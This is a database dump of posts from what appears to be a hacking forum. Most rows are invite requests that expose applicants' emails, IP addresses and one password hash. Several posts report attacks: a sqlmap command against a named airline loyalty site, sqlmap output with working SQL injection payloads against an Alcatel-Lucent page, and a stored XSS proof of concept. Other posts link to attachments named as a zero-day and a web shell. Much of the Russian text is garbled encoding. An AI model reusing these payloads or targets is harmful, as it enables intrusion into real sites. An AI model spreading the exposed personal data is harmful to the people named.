(1962, 1670, 0, 'Invite', 2, '{$name}', 1410217869, '[SIZE=\'4\'][COLOR=\'Sienna\']0wner[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: errorreport53@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.59.47.33\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://vk.com/pages?oid=-377163&p=0wner | https://vk.com/pages?oid=-377163&p=0wner \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1963, 1671, 0, 'null', 9, 'Sql velocityfrequentflyer.com', 1410233668, '[QUOTE]velocityfrequentflyer.com[/QUOTE]\r\n\r\nsqlmap -u \"http://www.velocityfrequentflyer.com/apps/velocity/faq/article.php?id=416\" --dbs\r\n\r\ntime-based blind\r\n\r\nÑð÷ы ýõ òÑÂõ ôþÑÂтðû\r\n\r\n[QUOTE]\r\ninformation_schema\r\n VOZkb\r\n VOZkb_upgrade\r\n vausphpkb\r\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1964, 1672, 0, 'null', 9, 'enterprise-news.alcatel-lucent.com', 1410233808, '[QUOTE][url]http://enterprise-news.alcatel-lucent.com/v1/TEMPLATES/doc.php?doc_ID=1857&rubrique_ID=883&rubLimit=[/url] [/QUOTE]\n\nßðрðüõтр rubrique_ID\nÞôýð ñô 1\n\n[QUOTE]\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND (SELECT 7474 FROM(SELECT COUNT(*),CONCAT(0x716d6a6471,(SELECT (CASE WHEN (7474=7474) THEN 1 ELSE 0 END)),0x716f$\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 1 column\n Payload: doc_ID=1857&rubrique_ID=883 UNION ALL SELECT CONCAT(0x716d6a6471,0x79514174487272456945,0x716f6d6c71)#&rubLimit=\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: doc_ID=1857&rubrique_ID=883 AND SLEEP(5)&rubLimit=\n---\nweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)\nweb application technology: PHP 5.3.2, Apache 2.2.14\nback-end DBMS: MySQL 5.0\navailable databases [1]:\n[*] 1\n\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND (SELECT 7474 FROM(SELECT COUNT(*),CONCAT(0x716d6a6471,(SELECT (CASE WHEN (7474=7474) THEN 1 ELSE 0 END)),0x716f$\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 1 column\n Payload: doc_ID=1857&rubrique_ID=883 UNION ALL SELECT CONCAT(0x716d6a6471,0x79514174487272456945,0x716f6d6c71)#&rubLimit=\n\n Type: AND/OR time-based blind\n Title: MySQL > 5.0.11 AND time-based blind\n Payload: doc_ID=1857&rubrique_ID=883 AND SLEEP(5)&rubLimit=\n---\nweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)\nweb application technology: PHP 5.3.2, Apache 2.2.14\nback-end DBMS: MySQL 5.0\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n---\nPlace: GET\nParameter: rubrique_ID\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: doc_ID=1857&rubrique_ID=883 AND 9553=9553&rubLimit=\n\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1966, 1673, 0, 'Invite', 2, '{$name}', 1410246132, '[SIZE=\'4\'][COLOR=\'Sienna\']lamp44[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: lamp_rad@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.220.69.124\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1965, 1658, 1942, 'null', 9, '', 1410234541, 'ÕÑÂть чõóþ øýтøрõÑÂýþóþ ýð ftp? Úтþ-тþ ÑÂûøòðû?', 1, 1, '', 0, 1, 0, 0, 0),
(1968, 1675, 0, 'Invite', 2, '{$name}', 1410281798, '[SIZE=\'4\'][COLOR=\'Sienna\']Gold.V!per[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: yosef.kazemian@ICQ.com\n[b]e-mail[/b]: crazy.hacke3r@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.250.47.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:31.0) Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1972, 1677, 0, 'Invite', 2, '{$name}', 1410343238, '[SIZE=\'4\'][COLOR=\'Sienna\']ovr[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: skype izaets28rus\n[b]e-mail[/b]: talk@dmtry.me\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 159.255.2.203\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2145.4 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ovr.org | ovr.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1973, 1678, 0, 'Invite', 2, '{$name}', 1410352098, '[SIZE=\'4\'][COLOR=\'Sienna\']nyu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123456\n[b]e-mail[/b]: cashhazard7@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.55.63.253\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1974, 1679, 0, 'Invite', 2, '{$name}', 1410358171, '[SIZE=\'4\'][COLOR=\'Sienna\']Enigma[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d0lus@jabber.org\n[b]e-mail[/b]: dolus@mail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.114.44.88\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Enigma : dem09@bk.ru : 62.109.191.118 : 963458ab559f450b5f8ccdca833bd91a\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://enigma.com | enigma.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1979, 1681, 0, 'Invite', 2, '{$name}', 1410383376, '[SIZE=\'4\'][COLOR=\'Sienna\']Dell-Pc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ali.ahmad1393@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.80.186.107\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1980, 1682, 0, 'Invite', 2, '{$name}', 1410387870, '[SIZE=\'4\'][COLOR=\'Sienna\']emmek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: emmek11@live.it\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.44.1.123\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.gimptalk.com/index.php?/user/...emmek/page... | http://www.gimptalk.com/index.php?/user/...emmek/page... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1982, 1683, 0, 'Invite', 2, '{$name}', 1410397562, '[SIZE=\'4\'][COLOR=\'Sienna\']T0XID0[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mani911call@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 91.235.168.178\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://t0xid0.blogspot.com | t0xid0.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1984, 1685, 0, 'w0rm', 1, 'GitHub account', 1410402805, 'Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» рõÿþ÷øтþрøù ýð óøт хðñõ, úþô ñуôу òыúûðôыòðть тþûьúþ тð чтþ-ñы ýø чõóþ ýõ ÿþтõрÑÂûþÑÂÑŒ, рõÿþ÷øтþрøø ÑÂúрытыõ.\r\n[url]https://github.com/w0rmIN/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1985, 1685, 1984, 'null', 9, '', 1410406659, '[QUOTE=w0rm;1984]Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» рõÿþ÷øтþрøù ýð óøт хðñõ, úþô ñуôу òыúûðôыòðть тþûьúþ тð чтþ-ñы ýø чõóþ ýõ ÿþтõрÑÂûþÑÂÑŒ, рõÿþ÷øтþрøø ÑÂúрытыõ.\r\n[url]https://github.com/w0rmIN/[/url][/QUOTE]\r\n\r\nÚþô чõóþ?', 1, 1, '', 0, 1, 0, 0, 0),
(1986, 1685, 1984, 'w0rm', 1, '', 1410407419, 'ò цõûþü úþô, þт ÑÂòþøх ýðрðñþтþú ø ôþ ÑÂûøтых óþрцõò.\nüы тут ñыòðõт у÷úøü úруóþü õщõ ø ÿрþóрðüüøруõü)', 1, 0, '', 0, 1, 0, 0, 0),
(1987, 1685, 1984, 'null', 9, '', 1410408827, 'ßþôÿøÑÂðÃȄÂÑÂ))', 1, 1, '', 0, 1, 0, 0, 0),
(1988, 1685, 1984, 'w0rm', 1, '', 1410409907, 'ÿрøþñщøû ú ÿрøòðтýыü рð÷рðñþтúðü))', 1, 0, '', 0, 1, 0, 0, 0),
(1990, 1686, 0, 'Invite', 2, '{$name}', 1410445714, '[SIZE=\'4\'][COLOR=\'Sienna\']IceWolfBiH[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 551373815\n[b]e-mail[/b]: icewolfbih@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.176.173.103\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://icewolfbih.planetsoho.com | icewolfbih.planetsoho.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1994, 1101, 1173, 'unlog', 45, '', 1410520686, 'ÃÂõ ÑÂтþûьúþ ñðó, ÑÂúþûьúþ ÿûþхðѠýðÑÂтрþùúð.\nßþûь÷þòðтõûõù üþöýþ ÑÂüþтрõть ýõ ûþóøýÑÂÑÂÑŒ.\n[url]http://w0rm.in:8888/member.php?u=3[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1995, 1687, 0, 'Invite', 2, '{$name}', 1410524092, '[SIZE=\'4\'][COLOR=\'Sienna\']vky[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: spvikram001@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 182.70.9.85\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vky.tumblr.com | vky.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1996, 1101, 1173, 'lumbricus', 39, 'Stored XSS - Market', 1410525132, 'Englaza: XSS/iFrame Injection (Market)\r\n\r\nMarket Vulnerable to Stored XSS and Iframe Inject.\r\n\r\nPOST: \r\n\r\n[url]http://w0rm.in/market/managetasklist.php?action=add&id=31[/url]\r\n\r\n[HTML]name=xss%2Fiframe+inject&desc=\">&milestone=0[/HTML]\r\n\r\nPoC: [HTML]http://w0rm.in/market/managetask.php?action=showtask&tid=35&id=31[/HTML]', 1, 0, '', 0, 1, 0, 0, 0),
(1997, 1688, 0, 'Invite', 2, '{$name}', 1410526507, '[SIZE=\'4\'][COLOR=\'Sienna\']pro4dz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123456789321\n[b]e-mail[/b]: abdellah09bvb@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.202.112.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pro4dz.blogspot.com | pro4dz.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1998, 1101, 1173, 'lumbricus', 39, 'Enumeration Vuln - ßõрõчøÑÂûõýøõ ãÑÂ÷òøüþÑÂть', 1410528486, 'Englaza: I am not sure if you want to consider this a vulnerability, but I cannot find these files within any public post. So they must be files that have been sent within private messages.\r\n\r\nRU: Üþöõт ñыть ûþöýþ-ÿþûþöøтõûьýыõ, фðùûы ø÷ ûøчýþóþ ÑÂþþñщõýøÑÂ?\r\n\r\nï ýõ üþóу ýðùтø ÑÂтø фðùûы ò þñщõÑÂтòõýýþü фþруüõ..\r\n\r\n\r\n[url]http://w0rm.in:8888/attachment.php?attachmentid=1&stc=1&d=1410527501[/url] = payload.zip\r\n\r\n[url]http://w0rm.in:8888/attachment.php?attachmentid=2&stc=1&d=1410527501[/url] = vb0day.txt\r\n\r\n[url]http://w0rm.in:8888/attachment.php?attachmentid=4&stc=1&d=1410527501[/url] = wso_antiaibolit.zip', 1, 0, '', 0, 1, 0, 0, 0),
(1999, 1689, 0, 'Invite', 2, '{$name}', 1410529240, '[SIZE=\'4\'][COLOR=\'Sienna\']certina[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 22222221\n[b]e-mail[/b]: certina@xru.ru\n[b]Info[/b]: LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-LonglivePutin-\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://certina.prommag.ru | certina.prommag.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 